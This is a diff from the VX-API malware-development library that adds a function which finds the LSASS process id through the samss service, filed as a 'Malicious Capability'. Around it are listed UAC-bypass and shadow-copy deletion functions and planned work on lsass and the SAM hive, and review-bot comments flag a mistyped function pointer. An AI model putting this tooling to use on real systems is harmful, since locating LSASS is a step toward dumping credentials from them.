mirror of https://github.com/vxunderground/VX-API
parent
1653f4ef37
commit
f7651a0696
@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
# VX-API
|
Version: 2022.210
Version: 2022.215
|
Developer: smelly__vx
|
|
@ -126,12 +126,12 @@ You're free to use this in any manner you please. You do not need to use this en
| MpfComVssDeleteShadowVolumeBackups | am0nsec | Malicious Capability |
| OleGetClipboardData | Microsoft | Malicious Capability |
| UacBypassFodHelperMethod | winscripting.blog | Malicious Capability |
| MpfGetLsaPidFromServiceManager | modexp | Malicious Capability |
| MpfGetLsaPidFromRegistry | modexp | Malicious Capability |
|
# Todo list
| Functionality | Author | Note |
| ------------- | ------ | ---- |
| QueryServiceStatusEx | modexp | SAMSS |
| NtQueryInformationFile | modexp | lsass |
| NtFsControlFile | modexp | lsass pipe |
| NtQueryOpenSubKeysEx | modexp | sam |
@ -79,6 +79,3 @@ typedef VOID(WINAPI* WTSFREEMEMORY)(PVOID);
*******************************************/
typedef BOOL(WINAPI* CONVERTSIDTOSTRINGSIDW)(PSID, LPWSTR*);
typedef BOOL(WINAPI* CONVERTSIDTOSTRINGSIDA)(PSID, LPSTR*);
typedef SC_HANDLE(WINAPI* OPENSCMANAGERW)(LPCWSTR, LPCWSTR, DWORD);
typedef SC_HANDLE(WINAPI* OPENSERVICEW)(SC_HANDLE, LPCWSTR, DWORD);
typedef SC_HANDLE(WINAPI* QUERYSERVICESTATUSEX)(SC_HANDLE, SC_STATUS_TYPE, LPBYTE, DWORD, LPDWORD);
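Review bot: The return type of the `QUERYSERVICESTATUSEX` function-pointer typedef does not match the API it names: `QueryServiceStatusEx` returns `BOOL`, not `SC_HANDLE`, so a call made through this pointer would treat a success/failure flag as a handle. It should read `typedef BOOL(WINAPI* QUERYSERVICESTATUSEX)(SC_HANDLE, SC_STATUS_TYPE, LPBYTE, DWORD, LPDWORD);`. The `SC_HANDLE` returns on `OPENSCMANAGERW` and `OPENSERVICEW` are correct for those APIs. The hunk counts (`-79,6 +79,3`) do not match the five typedefs shown, so which of these lines the commit actually adds cannot be told from this rendering; the new `MpfGetLsaPidFromServiceManager` body elsewhere in the commit calls these APIs directly rather than through the typedefs.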
@ -23,7 +23,7 @@ int main(VOID)
{
DWORD dwError = ERROR_SUCCESS;
|
dwError = GetPidFromPidBruteForcingW((PWCHAR)L"cmd.exe");
dwError = MpfGetLsaPidFromServiceManager();
|
return dwError;
}
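Review bot: `dwError = MpfGetLsaPidFromServiceManager();` stores a process id (or 0 when the lookup fails) in a variable named `dwError`, and `main` then returns it as the exit status, so a successful lookup exits non-zero and a failed one exits with `ERROR_SUCCESS`. If this is only a scratch harness that is harmless, but a separate variable keeps the two meanings apart, e.g. `DWORD dwLsaPid = MpfGetLsaPidFromServiceManager();` followed by `return dwLsaPid == 0 ? ERROR_NOT_FOUND : ERROR_SUCCESS;`. The start of `main` lies outside this hunk.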
@ -0,0 +1,31 @@
#include "Win32Helper.h"
|
DWORD MpfGetLsaPidFromServiceManager(VOID)
{
SC_HANDLE Manager = NULL, ServiceHandle = NULL;
DWORD ProcessId = ERROR_SUCCESS, BytesNeeded = ERROR_SUCCESS;
SERVICE_STATUS_PROCESS ServiceStatus = { 0 };
|
Manager = OpenSCManagerW(NULL, NULL, SC_MANAGER_CONNECT);
if (Manager == NULL)
return 0;
|
ServiceHandle = OpenServiceW(Manager, L"samss", SERVICE_QUERY_STATUS);
if (ServiceHandle == NULL)
goto EXIT_ROUTINE;
|
if(!QueryServiceStatusEx(ServiceHandle, SC_STATUS_PROCESS_INFO, (LPBYTE)&ServiceStatus, sizeof(ServiceStatus), &BytesNeeded))
goto EXIT_ROUTINE;
|
ProcessId = ServiceStatus.dwProcessId;
|
EXIT_ROUTINE:
|
if(ServiceHandle)
CloseServiceHandle(ServiceHandle);
|
if (Manager)
CloseServiceHandle(Manager);
|
return ProcessId;
}
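Review bot: `ProcessId = ServiceStatus.dwProcessId;` is taken without looking at `ServiceStatus.dwCurrentState`; `SERVICE_STATUS_PROCESS.dwProcessId` is documented as 0 when the service is not running, so a stopped samss service and a failed handle/query both come back as 0 and the caller cannot tell them apart. Nor can the caller fall back on `GetLastError()`, because the `CloseServiceHandle` calls under `EXIT_ROUTINE` run after the failing call and may overwrite it; saving the error before cleanup and restoring it on return, and reporting a non-running service as a failure, would give the declaration a contract a caller can act on. Initialising `ProcessId` and `BytesNeeded` with `ERROR_SUCCESS` reads as if they held error codes; plain `0` says what is meant, and the early `return 0;` on `OpenSCManagerW` failure bypasses the shared exit path, which is harmless today but easy to trip over once cleanup grows. A header comment such as `// Returns the process id the SCM reports for the samss service, or 0 on failure (GetLastError() gives the cause).` would complete the contract.
```c
	DWORD ProcessId = 0, BytesNeeded = 0, LastError = ERROR_SUCCESS;
	// … unchanged: OpenSCManagerW / OpenServiceW / QueryServiceStatusEx calls …

	// dwProcessId is 0 unless the service is running; report that as a failure, not as a PID of 0
	if (ServiceStatus.dwCurrentState != SERVICE_RUNNING || ServiceStatus.dwProcessId == 0) {
		SetLastError(ERROR_SERVICE_NOT_ACTIVE);
		goto EXIT_ROUTINE;
	}

	ProcessId = ServiceStatus.dwProcessId;

EXIT_ROUTINE:
	LastError = GetLastError();   // CloseServiceHandle may clobber it
	// … unchanged: CloseServiceHandle calls …
	SetLastError(LastError);
	return ProcessId;
```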
@ -207,6 +207,7 @@
<ClCompile Include="MpfComModifyShortcutTarget.cpp" />
<ClCompile Include="MpfComVssDeleteShadowVolumeBackups.cpp" />
<ClCompile Include="MpfGetLsaPidFromRegistry.cpp" />
<ClCompile Include="MpfGetLsaPidFromServiceManager.cpp" />
<ClCompile Include="OleGetClipboardData.cpp" />
<ClCompile Include="RecursiveFindFile.cpp" />
<ClCompile Include="RemoveDllFromPeb.cpp" />
@ -372,6 +372,9 @@
<ClCompile Include="TryLoadDllMultiMethod.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
<ClCompile Include="MpfGetLsaPidFromServiceManager.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="Internal.h">
@ -134,6 +134,7 @@ BOOL MpfComModifyShortcutTargetA(_In_ PCHAR LnkPath, _In_ PCHAR LnkExecutionPro
BOOL UacBypassFodHelperMethodA(_In_ PCHAR PathToBinaryToExecute, _Inout_ PPROCESS_INFORMATION Pi);
BOOL UacBypassFodHelperMethodW(_In_ PWCHAR PathToBinaryToExecute, _Inout_ PPROCESS_INFORMATION Pi);
DWORD MpfGetLsaPidFromRegistry(VOID);
DWORD MpfGetLsaPidFromServiceManager(VOID);
|
//evasion
BOOL CreateProcessWithCfGuardW(_Inout_ PPROCESS_INFORMATION Pi, _In_ PWCHAR Path);
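Review bot: The new prototype `DWORD MpfGetLsaPidFromServiceManager(VOID);` carries no description of its return value, while the definition added in this commit returns 0 both when the service-control handles cannot be opened and when the status query fails, so a caller reading only this header cannot tell how "no PID" is signalled. A one-line comment on the declaration such as `// Returns the process id the SCM reports for the samss service, or 0 on failure.` would make the contract visible where callers look. The adjacent `MpfGetLsaPidFromRegistry` declaration, which appears to be pre-existing context here, is undocumented in the same way and would benefit from the same treatment.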